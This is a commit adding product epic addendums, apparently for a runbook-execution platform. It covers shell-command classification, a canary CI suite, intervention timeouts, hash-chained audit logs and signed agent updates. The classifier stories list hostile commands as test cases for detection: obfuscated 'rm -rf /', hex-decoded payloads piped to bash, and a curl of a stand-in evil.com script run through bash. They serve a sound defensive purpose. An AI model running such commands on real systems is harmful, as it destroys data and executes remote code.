Add BMad review epic addendums for all 6 products

Per-product surgical additions to existing epics (not cross-cutting):
- P1 route: 8pts (key redaction, SSE billing, token math, CI runner)
- P2 drift: 12pts (mTLS revocation, state lock recovery, pgmq visibility, RLS leak, entropy scrubber)
- P3 alert: 10pts (HMAC replay, claim-check, out-of-order correlation, free tier, tenant isolation)
- P4 portal: 9pts (partial scan recovery, ownership conflicts, Meilisearch rebuild, VCR freshness, free tier)
- P5 cost: 7pts (concurrent baselines, remediation RBAC, Clock interface, property tests, Redis fallback)
- P6 run: 15pts (shell AST parsing, canary suite, intervention TTL, streaming audit, crypto signatures)

Total: 61 story points across 30 new stories
This commit is contained in:
2026-03-01 02:27:55 +00:00
parent cc003cbb1c
commit 72a0f26a7b
6 changed files with 449 additions and 0 deletions

View File

@@ -0,0 +1,81 @@
# dd0c/run — Epic Addendum (BMad Review Findings)
**Source:** BMad Code Review (March 1, 2026)
**Approach:** Surgical additions to existing epics — no new epics created.
---
## Epic 1 Addendum: Runbook Parser
### Story 1.7: Shell AST Parsing (Not Regex)
As a safety-critical execution platform, I want command classification to use shell AST parsing (mvdan/sh), so that variable expansion attacks, eval injection, and hex-encoded payloads are caught.
**Acceptance Criteria:**
- `X=rm; Y=-rf; $X $Y /` classified as Dangerous (variable expansion resolved).
- `eval $(echo 'rm -rf /')` classified as Dangerous.
- `printf '\x72\x6d...' | bash` classified as Dangerous (hex decode).
- `bash <(curl http://evil.com/payload.sh)` classified as Dangerous (process substitution).
- `alias ls='rm -rf /'; ls` classified as Dangerous (alias redefinition).
- Heredoc with embedded danger classified as Dangerous.
- `echo 'rm -rf / is dangerous'` classified as Safe (string literal, not command).
- `kubectl get pods -n production` classified as Safe.
**Estimate:** 5 points
---
## Epic 2 Addendum: Action Classifier
### Story 2.7: Canary Suite CI Gate (50 Known-Destructive Commands)
As a safety-first platform, I want a canary suite of 50 known-destructive commands that must ALL be classified as Dangerous, so that classifier regressions are caught before merge.
**Acceptance Criteria:**
- Suite contains exactly 50 commands (rm, mkfs, dd, fork bomb, chmod 777, kubectl delete, terraform destroy, DROP DATABASE, etc.).
- All 50 classified as Dangerous — any miss is a blocking CI failure.
- Suite count assertion prevents accidental removal of canary commands.
- Runs on every push and PR.
**Estimate:** 2 points
---
## Epic 3 Addendum: Execution Engine
### Story 3.8: Intervention Deadlock TTL
As a reliable execution engine, I want manual intervention states to time out after a configurable TTL, so that a stuck execution doesn't hang forever waiting for a human who's asleep.
**Acceptance Criteria:**
- Manual intervention state transitions to FailedClosed after TTL (default 5 minutes).
- FailedClosed triggers out-of-band critical alert with execution context.
- Human resolution before TTL transitions to Complete (no FailedClosed).
**Estimate:** 2 points
---
## Epic 5 Addendum: Audit Trail
### Story 5.7: Streaming Append-Only Audit with Hash Chain
As a compliance-ready platform, I want audit events streamed immediately (not batched) with a cryptographic hash chain, so that tampering is detectable and events survive agent crashes.
**Acceptance Criteria:**
- Audit event available within 100ms of command execution (no batching).
- Hash chain: tampering with any event breaks the chain (detected by `verify_chain()`).
- WAL (write-ahead log): events survive agent crash and are recoverable.
**Estimate:** 3 points
### Story 5.8: Cryptographic Signatures for Agent Updates
As a zero-trust platform, I want agent binary and policy updates signed with the customer's Ed25519 key, so that a compromised SaaS cannot push malicious code to customer infrastructure.
**Acceptance Criteria:**
- Agent rejects binary update with invalid signature.
- Agent rejects policy update signed only by SaaS key (requires customer key).
- Agent accepts update with valid customer signature.
- Failed signature verification falls back to existing policy (no degradation).
**Estimate:** 3 points
---
**Total Addendum:** 15 points across 5 stories